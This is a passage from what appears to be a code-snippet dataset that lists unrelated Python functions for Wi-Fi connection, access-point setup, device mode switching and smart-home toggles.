})\n try:\n logging.info(\"Creating hotspot connection: {} - {}\".format(s_con[\"id\"], s_con[\"uuid\"]))\n ##########\n bus = dbus.SystemBus()\n proxy = bus.get_object(\n \"org.freedesktop.NetworkManager\", \"/org/freedesktop/NetworkManager/Settings\"\n )\n settings = dbus.Interface(proxy, \"org.freedesktop.NetworkManager.Settings\")\n connection = settings.AddConnection(con)\n logging.info(f\"Created access point connection {connection}\")\n except Exception as e:\n logging.error(\"Hotspot connection creation failed\")\n logging.error(e)", "def set_airplane_mode(self, action):\n\n is_action_performed = False\n is_airplane_mode_on_off_visible = False\n\n settings_more_button = \\\n 'self.android_locators.SETTINGS_MORE_BUTTON_ByXPATH'\n airplane_mode_on_off_toggle = \\\n 'self.android_locators.AIRPLANE_MODE_ON_OFF_ByID'\n\n if self.phone_info.phone_type == PhoneType.IOS:\n airplane_mode_on_off_toggle = \\\n 'self.ios_locators.AIRPLANE_MODE_ON_OFF_ByXPATH'\n no_sim_card_installed_msg = \\\n 'self.ios_locators.NO_SIM_CARD_INSTALLED_ByXPATH'\n no_sim_card_installed_ok_button = \\\n 'self.ios_locators.NO_SIM_CARD_INSTALLED_OK_BUTTON_ByXPATH'\n\n try:\n try:\n # verify that Airplane Mode Button is visible\n is_airplane_mode_on_off_visible = self.find_element(\n self.driver.appium_driver,\n airplane_mode_on_off_toggle, 0).is_displayed()\n except:\n logger.debug(\n \"Airplane Mode ON/OFF button is currently not visible\")\n\n if self.phone_info.phone_type == PhoneType.ANDROID:\n if not is_airplane_mode_on_off_visible:\n self.driver.appium_driver.close_app()\n self.driver.appium_driver.launch_app()\n time.sleep(1)\n self.wait_till_element_to_be_visible(\n self.driver.appium_driver, settings_more_button, 5)\n self.find_element(self.driver.appium_driver,\n settings_more_button, 1).click()\n # self.wait_till_element_to_be_visible(\n # self.driver.appium_driver, airplane_mode_on_off_toggle)\n logger.debug(\n \"Click on more button to make Airplane Mode visible\")\n\n airplane_mode_toggle_status = self.find_element(\n self.driver.appium_driver,\n airplane_mode_on_off_toggle).text\n if airplane_mode_toggle_status.upper() == action.upper():\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n else:\n self.find_element(self.driver.appium_driver,\n airplane_mode_on_off_toggle, 0).click()\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n self.driver.appium_driver.back()\n\n elif self.phone_info.phone_type == PhoneType.IOS:\n if not is_airplane_mode_on_off_visible:\n self.driver.appium_driver.close_app()\n self.driver.appium_driver.launch_app()\n time.sleep(1)\n airplane_mode_toggle_status = self.find_element(\n self.driver.appium_driver, airplane_mode_on_off_toggle,\n 0).text\n\n if action.upper() == \"ON\":\n if (airplane_mode_toggle_status == False) or \\\n (airplane_mode_toggle_status == '1'):\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n try:\n self.wait_till_element_to_be_visible(\n self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 3)\n self.find_element(self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 0).click()\n except:\n pass\n\n else:\n self.find_element(self.driver.appium_driver,\n airplane_mode_on_off_toggle,\n 0).click()\n try:\n self.wait_till_element_to_be_visible(\n self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 3)\n self.find_element(self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 0).click()\n except:\n pass\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n elif action.upper() == \"OFF\":\n if (airplane_mode_toggle_status == True) or \\\n (airplane_mode_toggle_status == '0'):\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n else:\n self.find_element(self.driver.appium_driver,\n airplane_mode_on_off_toggle,\n 0).click()\n time.sleep(1)\n\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n else:\n logger.debug(\n \"Only ON/OFF operation is possible with Airplane \"\n \"Mode. {} option is not permitted\".format(\n action))\n\n except Exception as e:\n logger.error(\n \"Exception occured while performing Airplane mode {} \".format(\n action))\n logger.error(repr(e))\n\n return is_action_performed", "def wifi_connect(self, vap: VirtualAPHostapd) -> bool:\n config_file_name = \"boardfarm_tmp.conf\"\n config_file_path = \"/tmp/{}\".format(config_file_name)\n\n # Create network configuration for SSID\n bssid = \"bssid={}\".format(vap.bssid)\n ssid = \"ssid=\\\"{}\\\"\".format(vap.get_ssid())\n key = \"psk=\\\"{}\\\"\".format(vap.get_psk())\n network_config = \"network={{\\n{}\\n{}\\n{}\\n}}\".format(bssid, ssid, key)\n # Clean up previous configuration\n self.sendline(\"rm -f \\\"{}\\\"\".format(config_file_path))\n self.expect(self.prompt)\n self.sendline(\"echo \\'{}\\' > \\\"{}\\\"\".format(network_config, config_file_path))\n self.expect(self.prompt)\n # Start wpa_supplicant with created configuration\n # Typical coommand on RPI: wpa_supplicant -B -c/tmp/temp.conf -iwlan0 -Dnl80211,wext\n self.sudo_sendline(\"wpa_supplicant -B -D{} -i{} -c{}\".format(\n self.driver_name, self.iface_wifi, config_file_path))\n self.expect(\"Successfully initialized wpa_supplicant\")\n return bool(self.match)", "def _select_mode(self):\n self.__check_mode()\n if self.mode[\"auto_mode\"]:\n self.mode_auto()\n elif self.mode[\"auto_mode\"] is None: # Do Nothing\n self.mode_standby()\n else:\n self.mode_manual()", "def is_on(self) -> bool:\n return self.tuya_device.status.get(DPCODE_SWITCH, False)", "def set_mode(vehicle, mode):\n util.log_info(\"Setting %s.\" % mode)\n shared.status['manual_mode'] = mode\n vehicle.mode = VehicleMode(mode)\n \n wait_count = 0 \n while True:\n time.sleep(.2)\n wait_count = wait_count + 1\n \n if vehicle.mode.name == mode :\n return True\n \n elif wait_count >= 45:\n util.log_warning(\"Unable to set %s. Assume link lost.\" % mode)\n shared.status['abort'] = True\n return False\n \n elif wait_count % 15 == 0 :\n util.log_warning(\"Retry setting %s\" % mode)\n vehicle.mode = VehicleMode(mode) # resend command", "def setup():\n print('Setup option is not working')\n quit()\n print('Long press the reset button until the blue Led is blinking quickly')\n print('Long press again until blinking slowly')\n print('Manually connect this device to the Wifi SSID named BlroadlinkProv')\n print('Press security mode (0 = none, 1 = WEP, 2 = WPA1, 3 = WPA2, 4 = WPA1/2)')\n print('Default:3')\n\n security = raw_input('Security mode:').lower()\n\n if security == 'none':\n security = 0\n elif security == 'wep':\n security = 1\n elif security == 'wpa1':\n security = 2\n elif (security == 'wpa2') or (security == ''):\n security = 3\n elif security == 'wpa1/2':\n security = 4\n security = int(security)\n if not(0 <= security <= 4):\n raise IndexError\n\n ssid = raw_input('SSID of your router :')\n if security != 0:\n password = raw_input('Password:')\n else:\n password = ''\n broadlink.setup(ssid, password, security)", "def connect(self):\n self.sta_if = network.WLAN(network.STA_IF)\n self.sta_if.active(False)\n sleep(1)\n self.sta_if.active(True)\n\n dbg(\"Interface active\")\n if self.check_ap(self.ssid):\n # connect to access point\n if not self.sta_if.isconnected():\n dbg('connecting to AP...')\n self.sta_if.active(True)\n self.sta_if.connect(self.ssid, self.key)\n while not self.sta_if.isconnected():\n machine.idle()\n # Do we need a timeout here?\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"WLAN already connected\")\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"Target SSID not found.\")\n reset(\"Could not connect to network - target SSID is not availble.\", HARD)", "def set_into_managed_mode(wifi_name):\n \n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"down\"])\n subprocess.run([\"iwconfig\", wifi_name, \"mode\", \"managed\"])\n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"up\"])\n subprocess.run([\"service\", \"NetworkManager\", \"start\"])", "def check_mode(self):\n if self.proximity.check_press():\n self.cycle_mode()\n return self.mode", "def joinwifi():\n station = network.WLAN(network.STA_IF) # initiate a station mode\n\n if not station.isconnected():\n print('connecting to network:', ssid())\n station.active(True)\n station.connect(ssid(), password())\n \n\n while not station.isconnected():\n pass\n\n # deactivating access point mode\n ap = network.WLAN(network.AP_IF)\n ap.active(False)\n\n ip = station.ifconfig()[0]\n print('connected as:', ip)\n\n return ip", "def init_wlan_sta():\n\n print('WLAN: STA mode')\n wlan.init(mode=WLAN.STA)\n if not wlan.isconnected():\n wlan.connect(WLAN_SSID, auth=WLAN_AUTH, timeout=5000)\n while not wlan.isconnected():\n machine.idle() # save power while waiting", "def __check_mode(self):\n self.mode[\"auto_mode\"] = self.communications.get_mode()", "def _force_on(self):\n self._interface.set('fw_wp_vref', self._fw_wp_vref)\n self._interface.set('fw_wp_en', 'on')\n self._interface.set('fw_wp', 'on')", "def __auto_mode(self):\n while True:\n # establish connection\n while True:\n if self.android_api.is_connect():\n break\n self.android_api.init_bluetooth()\n time.sleep(0.05)\n\n\n if self.android_api.is_map_empty():\n if self.production:\n # self.print_msg(\"Waiting for map update\")\n time.sleep(0.05)\n continue\n else:\n self.__test_run_pipeline_style()\n else:\n self.print_msg(\"Updating map\")\n self.android_api.map_pop_n_exe()\n time.sleep(0.05)", "def check_enable_mode(self, *args, **kwargs):\n pass", "def checkWifi():\n try:\n subprocess.check_output(\"iwgetid\")\n return True\n except subprocess.CalledProcessError: # if not connected\n return False", "def do_internet(self, args):\n\n device = \\\n self._get_choice_(\"ahd\", self.ahds(), \"For which account holder device?\")\n device.toggle_internet()\n print(\"Device is now {}.\\n\".format([\"offline\", \"online\"][device.internet_connection]))", "def connect():\n \n print(\"*****Starting connection*****\")\n \n ssid = id_key.network_id #hidden ssid\n key = id_key.network_key #hidden key\n \n station = network.WLAN(network.STA_IF)\n \n if station.isconnected() == True:\n print(\"*****Already connected*****\")\n return\n \n station.active(True)\n station.connect(ssid, key)\n \n while station.isconnected() == False:\n pass\n \n print(\"*****Connection successful*****\")\n print(station.ifconfig())", "def turn_on(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Starting all torrents\")\n self._tm_client.api.start_torrents()\n elif self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission on\")\n self._tm_client.api.set_alt_speed_enabled(True)\n self._tm_client.api.update()", "def DualMode(self) -> bool:", "async def async_set_wifi_led_on(self):\n return", "def host_maintenance_mode(self, host, mode):\n if not mode:\n return 'off_maintenance'\n return 'on_maintenance'", "def host_maintenance_mode(self, host, mode):\n if not mode:\n return 'off_maintenance'\n return 'on_maintenance'", "def force_switch_on(self):\n self.turn_on_modem()", "def set_mode(self, mode):\n if mode == 'train':\n self.net.train()\n elif mode == 'eval':\n self.net.eval()\n else:\n raise ValueError(\n \"Got invalid mode '{}'. Valid options are 'train' and 'eval'.\".format(mode))", "def set_current_operation_mode(self, operation_mode):\n self._current_operation_mode = operation_mode\n \"\"\"Retrieve from textual representation\"\"\"\n if self._current_operation_mode == 'Off':\n self._api._opmode = 0;\n elif self._current_operation_mode == 'Heat only':\n self._api._opmode = 1;\n elif self._current_operation_mode == 'Cool only':\n self._api._opmode = 2;\n elif self._current_operation_mode == 'Heat & Cool':\n self._api._opmode = 3; \n self._api.set()\n self.schedule_update_ha_state()", "def on(config: dict):\n switch_device(config, config[\"inching\"], \"on\")", "def wifi_off(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE00\")\n time.sleep(100e-3)", "def wifi_callback(self, msg):\n self.wifi_strength = msg.signal_strength\n\n\tif self.odom != None:\n # if the turtlebot is in the wifi target range, then stop\n if abs(self.wifi_strength - self.target_strength) < 1.0:\n self.is_moving = False\n\n\t r = rospy.Rate(2)\n\t cmd_msg = Twist()\n\t cmd_msg.linear.x = NO_SPEED\n\t cmd_msg.angular.z = NO_SPEED\n\t self.cmd_pub.publish(cmd_msg)\n\n\t r.sleep()\n\n # otherwise, check what the new state should be according to the new reading\n else:\n\t self.state.odom_check(self.odom)\n\t self.state.scan_check(self.is_obstacle)\n self.target_odom = self.state.wifi_check(self.wifi_strength, self.prev_strength)\n\n self.prev_strength = self.wifi_strength", "def check_fw_mode(self, cat_cpuinfo_out):\n for line in cat_cpuinfo_out.splitlines():\n if \"firmware\" in line:\n if \"OPAL\" in line:\n return True\n else:\n return False\n return False", "def isDefaultMode():\n\treturn 0", "def mode_remote(self):\n self.send(\"!MR\")\n # time.sleep(2.0)\n # No feedback, so query to verify set\n got = self.get_mode()\n assert got == \"R\", got", "def setInfraParameters(self, sta, mode, distance):\n station.mode(str(sta), mode)\n \n seconds = 3\n self.src = str(sta)\n try:\n \"\"\"Based on RandomPropagationDelayModel (ns3)\"\"\"\n seconds = abs(mobility.speed[self.src])\n except:\n pass\n self.host = sta\n latency = wifiParameters.latency(distance)\n loss = wifiParameters.loss(distance)\n delay = wifiParameters.delay(distance, seconds)\n bw = wifiParameters.bw(distance, mode) \n self.host.pexec(\"tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit loss %.1f%% latency %.2fms delay %.2fms\" % (sta, bw, loss, latency, delay)) \n #os.system('util/m %s tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit latency %.2fms delay %.2fms' % (self.host, self.host, bandwidth, latency, delay))\n #self.host.cmd(\"tc qdisc replace dev %s-wlan0 root tbf rate %.2fmbit latency %.2fms burst 15k\" % (self.host, rate, latency)) \n associate = self.doAssociation(mode, distance)\n if associate == False:\n mobility.handover(self.host)", "def __getMode( self ):\n\n res = self.rssConfig.getConfigState()\n\n if res == 'Active':\n\n if self.rssClient is None:\n self.rssClient = ResourceStatusClient()\n return True\n\n self.rssClient = None\n return False", "def __remote_control_mode(self):\n while True:\n while True:\n if self.android_api.is_connect():\n break\n self.android_api.init_bluetooth()\n time.sleep(0.05)\n\n self.android_api.read_for_remote_control()\n time.sleep(0.05)", "def is_on(self):\n if self._switch_type == \"record_motion\":\n return self._camera_data[\"recording_mode\"] == TYPE_RECORD_MOTION\n elif self._switch_type == \"record_always\":\n return self._camera_data[\"recording_mode\"] == TYPE_RECORD_ALWAYS\n elif self._switch_type == \"record_smart\":\n return self._camera_data[\"recording_mode\"] == TYPE_RECORD_SMARTDETECT\n elif self._switch_type == \"ir_mode\":\n return self._camera_data[\"ir_mode\"] == self._ir_on_cmd\n elif self._switch_type == \"hdr_mode\":\n return self._camera_data[\"hdr_mode\"] is True\n elif self._switch_type == \"high_fps\":\n return self._camera_data[\"video_mode\"] == TYPE_HIGH_FPS_ON\n else:\n return self._camera_data[\"status_light\"] == \"True\"", "def turn_on(self, **kwargs) -> None:\n _LOGGER.debug(\n \"SynoDSMSurveillanceHomeModeToggle.turn_on(%s)\",\n self._api.information.serial,\n )\n self._api.surveillance_station.set_home_mode(True)", "def _disable_wifi_ap(self):\n call(['systemctl', 'disable', 'hostapd', ])\n call(['systemctl', 'disable', 'dnsmasq', ])\n\n context = self._get_ap_context()\n self._write_system_template('/etc/network/interfaces', 'interfaces.conf', context)\n self._write_system_template('/etc/dhcpcd.conf', 'dhcpcd.conf', context)", "def verify_ap_connection_mode(self, ap_mac, discovery_method = \"\"):\n ap_obj = self.mac_to_ap[ap_mac]\n\n logging.info(\"Get apmgrinfo of the AP %s\" % ap_mac)\n start_time = time.time()\n while True:\n apmgrinfo = ap_obj.get_ap_mgr_info()\n apmgrinfo = self._map_apmgrinfo_keys(apmgrinfo)\n\n if apmgrinfo and apmgrinfo[\"State\"] == \"RUN\":\n break\n\n time.sleep(2)\n if time.time() - start_time > 120:\n raise Exception(\"AP '%s' was not in RUN state\" % ap_mac)\n\n logging.debug(\"Obtained info: %s\" % apmgrinfo)\n\n logging.info(\"Get detailed information in ZD's webui about the AP %s\" % ap_mac)\n ap_info = APS.get_ap_detail_info_by_mac_addr(self.zd, ap_mac)\n logging.debug(\"Obtained infor: %s\" % ap_info)\n\n # Verify if the connection mode shown on AP's CLI and ZD are the same and correct\n conn_mode_in_zd = ap_info['tunnel_mode'].lower()\n # Use only first two characters (L2 or L3)\n conn_mode_in_zd = conn_mode_in_zd[:2]\n\n conn_mode_in_ap = apmgrinfo['Tunnel/Sec Mode'].split(\"/\")[0].strip().lower()\n conn_mode_in_ap = conn_mode_in_ap[:2]\n\n if conn_mode_in_ap != conn_mode_in_zd:\n msg = \"The connection mode shown on AP's CLI was '%s'\" % conn_mode_in_ap\n msg += \", which was different from the mode shown on ZD's webui '%s'\" % \\\n conn_mode_in_zd\n return msg\n\n discovery_reason = {\"fixed-pri\": \"Preferred Primary\",\n \"fixed-sec\": \"Preferred Secondary\",\n \"dns\": \"DNS\", \"dhcp\": \"DHCP\",\n \"record\": \"Last ZoneDir Joined\", \"l2\": \"L2 Discovery\"}\n\n if discovery_method in [\"fixed-pri\", \"fixed-sec\", \"dns\", \"dhcp\"]:\n if conn_mode_in_ap != \"l3\":\n msg = (\"The connection mode was %s instead of L3 [AP %s] [dmode %s]\" %\n (conn_mode_in_ap.upper(), ap_mac, discovery_method))\n return msg\n\n if apmgrinfo['Discover Director By'] != discovery_reason[discovery_method]:\n msg = \"The discover method showed on AP's CLI was '%s'\" % \\\n apmgrinfo['Discover Director By']\n msg += \", it should have been '%s'\" % discovery_reason[discovery_method]\n return msg\n\n elif discovery_method == \"record\":\n if apmgrinfo['Discover Director By'] != discovery_reason[discovery_method]:\n msg = \"The discover method showed on AP's CLI was '%s'\" % \\\n apmgrinfo['Discover Director By']\n msg += \", it should have been '%s'\" % discovery_reason[discovery_method]\n return msg\n\n else:\n if self.mac_to_vlan[ap_mac] == self.zd_vlan:\n if conn_mode_in_ap != \"l2\":\n msg = (\"The connection mode was %s instead of L2 [AP %s] [dmode %s]\" %\n (conn_mode_in_ap.upper(), ap_mac, discovery_method))\n return msg\n\n if apmgrinfo['Discover Director By'] not in discovery_reason[\"l2\"]:\n msg = \"The discover method showed on AP's CLI was '%s'\" % \\\n apmgrinfo['Discover Director By']\n msg += \", it should have been '%s'\" % discovery_reason[\"l2\"]\n return msg\n\n else:\n if conn_mode_in_ap != \"l3\":\n msg = (\"The connection mode was %s instead of L3 [AP %s] [dmode %s]\" %\n (conn_mode_in_ap.upper(), ap_mac, discovery_method))\n return msg\n\n return \"\"", "def handle_onoff_mode_received(\n msg: ReceiveMessage, template_name: str, attr: str\n ) -> None:\n payload = self.render_template(msg, template_name)\n payload_on: str = self._config[CONF_PAYLOAD_ON]\n payload_off: str = self._config[CONF_PAYLOAD_OFF]\n\n if payload == \"True\":\n payload = payload_on\n elif payload == \"False\":\n payload = payload_off\n\n if payload == payload_on:\n setattr(self, attr, True)\n elif payload == payload_off:\n setattr(self, attr, False)\n else:\n _LOGGER.error(\"Invalid %s mode: %s\", attr, payload)\n\n get_mqtt_data(self.hass).state_write_requests.write_state_request(self)", "def _get_state(self):\n fw_wp_en = (self._interface.get('fw_wp_en') == 'on')\n fw_wp = (self._interface.get('fw_wp') == 'on')\n if fw_wp_en:\n return self._STATE_FORCE_ON if fw_wp else self._STATE_FORCE_OFF\n else:\n return self._STATE_ON if fw_wp else self._STATE_OFF", "def setMode(self, request, context):\n \n self.vehicle.mode = VehicleMode(str(request.mode))\n self.vehicle.wait_ready('mode')\n \n return droneconnect_pb2.Null()", "def connect_to_wifi_network(SSID,Passphrase,security_mode):\r\n read_outputDict={}\r\n read_outputDict[\"status\"]=''\r\n #default path to connect wifi\r\n script_path=\"/usr/local/autotest/cros/scripts\"\r\n # os.chdir() is used to change dir to wifi script path\r\n change_dir = os.chdir(script_path)\r\n #cmd is used to connect to SSID with/without passphrase\r\n connect_cmd=\"./wifi connect \"+ SSID +\" \"+Passphrase +\" \"+ security_mode +\" >\" + \"status.txt\"\r\n #Popen then cmd and get th output to validate whether is connected or not\r\n get_output=subprocess.Popen(connect_cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True) \r\n \"\"\"if get_output.stderr:\r\n raise error.TestFail(\"Failed to connect to network\",SSID)\r\n else:\r\n print(\"Error \",get_output.stderr.readlines()) \"\"\" \r\n time.sleep(Delay_time)", "def IsWirelessUp(self):\n return self.wifi.IsUp()", "def SetOperateMode(self):\n handler = self.get_command_object(\"SetOperateMode\")\n handler()", "def setAdhocParameters(self, host, mode, **params):\n self.mode = mode\n latency = 10\n self.host = host\n #delay = 5 * distance\n try:\n options = dict( params )\n self.interface = options[ 'interface' ]\n except: \n self.interface = 'wlan0'\n \n bandwidth = wifiParameters.set_bw(mode)\n #self.host.cmd(host, \"tc qdisc replace dev %s-%s root netem rate %.2fmbit latency %.2fms delay %.2fms\" % (host, self.interface, rate, latency, delay)) \n self.host.cmd(\"tc qdisc add dev %s-%s root tbf rate %smbit latency %sms burst 1540\" % (str(host), self.interface, bandwidth, latency))", "def init_wlan_ap():\n\n print('WLAN: AP mode')\n wlan.init(mode=WLAN.AP,\n ssid='ttn-be-mapper',\n auth=(WLAN.WPA2, 'reppam-eb-ntt'),\n channel=7,\n antenna=WLAN.INT_ANT)", "def connect(self):\n # check if network is connected. If yes: return, finished\n # 2019-0801 changed: if self._wlan.isconnected():\n if self.isconnected:\n if USE_DEBUG:\n print('WLAN already connected')\n return self._wlan.ifconfig()\n\n # activate Wifi interface\n if self._wlan.active() is False:\n self._wlan.active(True)\n # scan available networks for the required one\n nets = self._wlan.scan()\n for net in nets:\n ssid = net[0]\n if ssid == bytearray(self._config['SSID']): # must use bytearray!\n if USE_DEBUG:\n print(\"Startup WiFi ...\" + self._config['SSID'])\n # specify if static or dynamic IP is requested\n # STATIC IP: an IP is given\n # DYNAMIC IP: None\n if self._config['STATIC_IP'] is not '':\n if USE_DEBUG:\n print('WifiManager::Static IP configuration')\n # configure network for static IP\n self._wlan.ifconfig((self._config['STATIC_IP'],\n self._config['MASKER'],\n self._config['GATEWAY_IP'],\n self._config['DNS']))\n\n # connect to SSID... either for STATIC or DYNAMIC IP\n self._wlan.connect(self._config['SSID'],\n self._config['PASSWRD'])\n while not self.isconnected:\n idle() # save power while waiting\n time.sleep_ms(100) # give it some time\n if USE_DEBUG:\n print(\"Network '{}' connection succeeded!\".format(ssid))\n break\n\n # check connection, if not succesfull: raise exception\n if not self._wlan.active():\n raise exception('Network {0} not found.'.format(ssid))\n\n # returns network configuration...\n # although 'myPy.local' should work on MacOS X (Bonjour)\n return self._wlan.ifconfig()", "def using_network(ssid, password, antenna=0):\n import network\n sta_if = network.WLAN(network.STA_IF)\n if not sta_if.isconnected():\n print('connecting to network...')\n sta_if.active(True)\n sta_if.config(antenna=antenna) # select antenna, 0=chip, 1=external\n sta_if.connect(ssid, password)\n while not sta_if.isconnected():\n # Check the status\n status = sta_if.status()\n # Constants aren't implemented for PYBD as of MicroPython v1.13.\n # From: https://github.com/micropython/micropython/issues/4682\n # 'So \"is-connecting\" is defined as s.status() in (1, 2) and \"is-connected\" is defined as s.status() == 3.'\n #\n if status <= 0:\n # Error States?\n return False\n #if ((status == network.WLAN.STAT_IDLE) or (status == network.WLAN.STAT_WRONG_PASSWORD)\n # or (status == network.WLAN.STAT_NO_AP_FOUND) or (status == network.WLAN.STAT_CONNECT_FAIL)):\n # Problems so return\n # return False\n\n print('network config:', sta_if.ifconfig())\n return True", "def configure_ap_connection_mode(self, ap_mac, mode, discovery_method = \"\", undo_reboot = False):\n if not self.components.has_key(\"L3Switch\"):\n raise Exception(\"There was not any managed switch present in the testbed\")\n\n logging.debug(\"The AP '%s' VLAN: %s\" % (ap_mac, self.mac_to_vlan[ap_mac]))\n logging.debug(\"The ZD VLAN: %s\" % self.zd_vlan)\n logging.debug(\"Expected connection mode: %s\" % mode.upper())\n\n ap_obj = self.mac_to_ap[ap_mac]\n rebooted = False\n mode = mode.lower()\n discovery_method = discovery_method.lower()\n logging.info(\"New connection mode: '%s' - discovery method: '%s'\" % \\\n (mode, discovery_method))\n\n if discovery_method in [\"fixed-pri\", \"fixed-sec\"]:\n if discovery_method == \"fixed-pri\":\n ip1 = self.zd.ip_addr\n ip2 = \"\"\n\n else:\n ip1 = \"1.1.1.1\"\n ip2 = self.zd.ip_addr\n\n logging.info(\"Configure director info on the AP '%s' to '%s' and '%s'\" % \\\n (ap_mac, ip1, ip2))\n\n ap_obj.set_director_info(ip1, ip2)\n logging.info(\"Reboot the AP to make the new change take effect\")\n ap_obj.reboot(login=False)\n rebooted = True\n\n else:\n logging.info(\"Get current director information on the AP\")\n zd_cfg_on_ap = ap_obj.get_director_cfg()\n\n if discovery_method in [\"dns\", \"dhcp\"]:\n logging.info(\"Reset AP's configuration to factory default in order to \\\n clear the ZD record\")\n\n # Modified by Serena Tan.2010.11.12.\n # To correct the argument.\n# ap_obj.set_factory(reboot=False)\n ap_obj.set_factory(login=False)\n\n if zd_cfg_on_ap[\"pri_zd_ip\"] or zd_cfg_on_ap[\"sec_zd_ip\"]:\n logging.info(\"Clear director information on the AP\")\n ap_obj.set_director_info(ip1 = \"\", ip2 = \"\")\n ap_obj.reboot(login=False)\n rebooted = True\n\n if discovery_method and not rebooted:\n logging.info(\"Reboot the AP\")\n ap_obj.reboot(login=False)\n rebooted = True\n\n if mode == \"l3\" and self.mac_to_vlan[ap_mac] == self.zd_vlan:\n if not undo_reboot and not rebooted:\n logging.info(\"Reboot the AP\")\n ap_obj.set_factory(login=False)\n # JLIN@08102010 no need to reboot since set_factory already included reboot procedure\n #ap_obj.reboot(login=False)\n rebooted = True\n\n logging.info(\"Move the AP from VLAN %s to VLAN %s\" % \\\n (self.mac_to_vlan[ap_mac], self.remote_vlan))\n\n self.components[\"L3Switch\"].remove_interface_from_vlan(\n self.mac_to_port[ap_mac],\n self.mac_to_vlan[ap_mac])\n\n self.components[\"L3Switch\"].add_interface_to_vlan(\n self.mac_to_port[ap_mac],\n self.remote_vlan)\n\n self.mac_to_vlan[ap_mac] = self.remote_vlan\n\n elif mode == 'l2':\n if self.mac_to_vlan[ap_mac] != self.zd_vlan:\n if not undo_reboot and not rebooted:\n logging.info(\"Reboot the AP\")\n ap_obj.set_factory(login=False)\n # JLIN@08102010 no need to reboot since set_factory already included reboot procedure\n #ap_obj.reboot(login=False)\n rebooted = True\n\n logging.info(\"Move the AP from VLAN %s to VLAN %s\" % \\\n (self.mac_to_vlan[ap_mac], self.zd_vlan))\n\n self.components[\"L3Switch\"].remove_interface_from_vlan(\n self.mac_to_port[ap_mac],\n self.mac_to_vlan[ap_mac])\n\n self.components[\"L3Switch\"].add_interface_to_vlan(\n self.mac_to_port[ap_mac],\n self.zd_vlan)\n\n self.mac_to_vlan[ap_mac] = self.zd_vlan\n\n else:\n rebooted = self.reboot_ap_if_not_l2_mode(ap_mac)\n\n if not undo_reboot and rebooted:\n logging.info(\"Try to reconnect to the AP after it is rebooted\")\n\n base_time = time.time()\n while True:\n try:\n # JLIN@08102010\n # fixed ap ssh error while ap is not boot up for sshd running\n # if ap from l2 change to l3, ap is rebooted by script\n # if ap already keep on l3 status, ap isn't rebooted by script\n logging.debug(\"Waiting AP reboot\")\n time.sleep(300) #\n logging.info(\"Detect the new IP leased of the AP at new VLAN\")\n self._detect_ap_dynamic_addresses([ap_mac])\n\n logging.debug(\"MAC to IP table: %s\" % self.mac_to_ip)\n\n ap_obj.ip_addr = self.mac_to_ip[ap_mac]\n logging.info(\"Try to connect to the AP at new IP %s\" % \\\n self.mac_to_ip[ap_mac])\n ap_obj.verify_component()\n break\n\n except:\n if time.time() - base_time > 360:\n msg = \"Unable to reconnect to the AP '%s' after making it \\\n become %s AP\" % (ap_mac, mode)\n raise Exception(msg)\n\n time.sleep(10)\n logging.info(\"Fail. Give it another try\")", "def _set_screen_type(self, **kwargs):\n self.show_ap = kwargs.get('ap', False)\n\tself.show_station = kwargs.get('station', False)\n self.sort_by = None\n self.sort_values = {}\n self.cmp_reverse = False\n if self.show_ap:\n self.toggle_val = 'known'\n self.toggle_check = False\n self._add_sort_value('bssid', 'ap.bssid', False)\n self._add_sort_value('signal', 'traffic.avg_sig', True)\n self._add_sort_value('crypt', 'ap.crypto', True)\n elif self.show_station:\n self.toggle_val = 'connected'\n self.toggle_check = False\n #TODO change after card station\n self._add_sort_value('bssid', 'station.bssid', False)\n self._add_sort_value('ap', 'station.ap_bssid', True)", "def get_wifi(self):\n return self._wifi", "def start(self, bs, nextIface, ssid, mode, channel, \n country_code, auth_algs, wpa, wpa_key_mgmt, rsn_pairwise, wpa_passphrase):\n self.apName.append(bs)\n self.apSSID[str(bs)] = ssid\n self.apMode[str(bs)] = mode\n self.cmd = (\"echo \\'\")\n \"\"\"General Configurations\"\"\" \n self.cmd = self.cmd + (\"interface=%s\" % nextIface) # the interface used by the AP\n \"\"\"Not using at the moment\"\"\"\n self.cmd = self.cmd + (\"\\ndriver=nl80211\")\n if(ssid!=None):\n self.cmd = self.cmd + (\"\\nssid=%s\" % ssid) # the name of the AP\n if(mode==\"g\" or mode==\"n\"):\n self.cmd = self.cmd + (\"\\nhw_mode=g\") \n elif (mode==\"b\"):\n self.cmd = self.cmd + (\"\\nhw_mode=b\") \n elif (mode==\"a\"):\n self.cmd = self.cmd + (\"\\nhw_mode=a\")\n if(channel!=None):\n self.cmd = self.cmd + (\"\\nchannel=%s\" % channel) # the channel to use \n if(mode==\"ac\"):\n self.cmd = self.cmd + (\"\\nwme_enabled=1\") \n self.cmd = self.cmd + (\"\\nieee80211ac=1\")\n self.cmd = self.cmd + (\"\\nwme_enabled=1\") \n self.cmd = self.cmd + (\"\\nieee80211n=1\")\n if(mode==\"n\"):\n self.cmd = self.cmd + (\"\\nht_capab=[HT40+][SHORT-GI-40][DSSS_CCK-40]\")\n \n #Not used yet!\n if(country_code!=None):\n self.cmd = self.cmd + (\"\\ncountry_code=%s\" % country_code) # the country code\n if(auth_algs!=None):\n self.cmd = self.cmd + 